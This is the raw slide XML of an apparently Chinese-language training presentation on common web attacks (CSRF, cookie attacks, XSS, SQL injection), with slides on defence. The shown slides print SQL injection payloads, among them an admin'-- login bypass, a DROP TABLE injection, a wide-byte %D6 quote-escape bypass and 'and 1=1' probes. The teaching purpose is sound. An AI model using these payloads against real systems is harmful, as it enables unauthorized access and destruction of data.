              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> Password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>'123‘</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>usersTable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>'username'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/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin';</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>drop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> table </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usersTable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/>
              <a:t>'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双</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字节</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>编码截断</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>URL:http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>localhost/a.php?id=10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%D6 ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>20AND%201=2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%23</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL: SELECT * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>FROM users </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>'username'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>'10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>謀</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>' AND 1=2#' LIMIT 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可以看到在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>前面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>加了个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%D6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>后</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>引号被吃掉</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>了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450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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入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196752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判断有无注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>点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加入单引号 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>提交</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>结果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>如果出现错误提示，则该网站可能就存在注入漏洞。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数字型判断是否有注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>语句：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and 1=1 ;and 1=2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>（经典）、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>' and '1'=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>字符型）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>结果：分别返回不同的页面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>说明存在注入漏洞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分析：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的意思是“和”如果没有过滤我们的语句，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>and 1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>就会被代入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>查询语句进行查询，如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>前后的两条语句都是真的话就不会出错，但如果前后语句有一个为假的话，程序就会暴错。也就表明程序有注入漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25535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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入防御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3648" y="1687116"/>
            <a:ext cx="52565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 smtClean="0"/>
              <a:t>不要拼接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>sql</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="24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/>
              <a:t>不要拼接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r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endParaRPr lang="en-US" altLang="zh-CN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/>
              <a:t>不要拼接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>sql</a:t>
            </a:r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0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/>
              <a:t>web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3648" y="1687116"/>
            <a:ext cx="52565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 smtClean="0"/>
              <a:t>跨</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>站请求伪造攻击（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>CSRF)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b="1" dirty="0" smtClean="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>攻击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 smtClean="0"/>
              <a:t>跨</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>站脚本攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>(XSS)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b="1" dirty="0" smtClean="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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/>
              <a:t>重定向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>攻击（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>钓鱼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/>
              <a:t>上传文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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/>
              <a:t>分布式拒绝服务攻击（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>DDos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/>
              <a:t>溢出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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/>
              <a:t>缓冲区溢出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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/>
              <a:t>散列</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>攻击（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>MD5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>等散列值数据库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52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290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跨</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>站请求伪造攻击（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CSRF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7048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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>.CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>是什么？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/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CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Cross-site request forgery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>），中文名称：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>跨站请求伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，也被称为：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>one click attack/session riding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，缩写为：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>CSRF/XSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>二</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>.CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>可以做什么？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>　　你这可以这么理解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>攻击：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻击者盗用了你的身份，以你的名义发送恶意请求。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>能够做的事情包括：以你名义发送邮件，发消息，盗取你的账号，甚至于购买商品，虚拟货币转账</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>......</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>造成的问题包括：个人隐私泄露以及财产安全。</a:t>
            </a:r>
          </a:p>
          <a:p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24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 5 Q&amp;A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50351" y="2708920"/>
            <a:ext cx="24432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zh-CN" alt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8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CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的原理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817"/>
            <a:ext cx="9144000" cy="51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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的原理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579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01" y="3356992"/>
            <a:ext cx="54768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2240" y="1988840"/>
            <a:ext cx="2232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在你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登陆</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>了一个重要网页时，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在你同时在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看美女</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>的时候，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在你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不知道情</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>的情况下，帮你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发了一个请求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a: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54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/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的原理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67056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13104" y="1412776"/>
            <a:ext cx="2151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你给别人转账时做了些什么？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1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登陆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填写转账信息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浏览器发了一个  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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>请求给服务器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服务器处理转账</a:t>
            </a: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0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4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的原理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72697" y="1412776"/>
            <a:ext cx="2123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CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>做了些啥？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1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在你看美女的时候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发了一个请求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然后你少了一千万</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj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68389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5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的原理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42412" cy="523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95736" y="609329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请求域名相同，取到的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>是同一个（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>Cookie=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>权限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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41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96890" y="66617"/>
            <a:ext cx="8772942" cy="75600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3 CSRF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43752" y="2708920"/>
            <a:ext cx="26564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演示</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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5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RDM BudgetThinking 2014Y V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wrap="square" rtlCol="0" anchor="ctr">
        <a:noAutofit/>
      </a:bodyPr>
      <a:lstStyle>
        <a:defPPr algn="ctr">
          <a:defRPr dirty="0" smtClean="0">
            <a:latin typeface="+mj-ea"/>
            <a:ea typeface="+mj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RDM BudgetThinking 2014Y V0.1</Template>
  <TotalTime>9098</TotalTime>
  <Words>1012</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>全屏显示(4:3)</PresentationFormat>
  <Paragraphs>226</Paragraphs>
  <Slides>30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RDM BudgetThinking 2014Y V0.1</vt:lpstr>
      <vt:lpstr>think-cell Slide</vt:lpstr>
      <vt:lpstr>常见web攻击</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>1.跨站请求伪造攻击（CSRF)</vt:lpstr>
      <vt:lpstr>1 CSRF的原理</vt:lpstr>
      <vt:lpstr> 2 CSRF的原理</vt:lpstr>
      <vt:lpstr>3 CSRF的原理</vt:lpstr>
      <vt:lpstr>4 CSRF的原理</vt:lpstr>
      <vt:lpstr>5 CSRF的原理</vt:lpstr>
      <vt:lpstr> 3 CSRF演示</vt:lpstr>
      <vt:lpstr>CSRF的防御总结</vt:lpstr>
      <vt:lpstr>2. Cookie攻击</vt:lpstr>
      <vt:lpstr>Cookie获取方法</vt:lpstr>
      <vt:lpstr>防范利用Cookie进行的攻击</vt:lpstr>
      <vt:lpstr>3.跨站脚本攻击(XSS)</vt:lpstr>
      <vt:lpstr>XSS必要前题</vt:lpstr>
      <vt:lpstr>XSS原理</vt:lpstr>
      <vt:lpstr>1 XSS长什么样子</vt:lpstr>
      <vt:lpstr>2 XSS长什么样子</vt:lpstr>
      <vt:lpstr>3 XSS长什么样子</vt:lpstr>
      <vt:lpstr>XSS代码插入方式</vt:lpstr>
      <vt:lpstr>XSS过滤绕过方式</vt:lpstr>
      <vt:lpstr> XSS演示</vt:lpstr>
      <vt:lpstr>XSS类型</vt:lpstr>
      <vt:lpstr>XSS防御</vt:lpstr>
      <vt:lpstr>4. SQL 注入</vt:lpstr>
      <vt:lpstr>SQL 原理</vt:lpstr>
      <vt:lpstr>SQL 注入</vt:lpstr>
      <vt:lpstr>SQL 注入防御</vt:lpstr>
      <vt:lpstr>常见web攻击</vt:lpstr>
      <vt:lpstr> 5 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JD研发部门2014年预算规划</dc:title>
  <dc:creator>章爱文</dc:creator>
  <cp:lastModifiedBy>Windows 用户</cp:lastModifiedBy>
  <cp:revision>741</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-12-03T06:04:46Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-08-26T14:26:00Z</dcterms:modified>
</cp:coreProperties>
</file>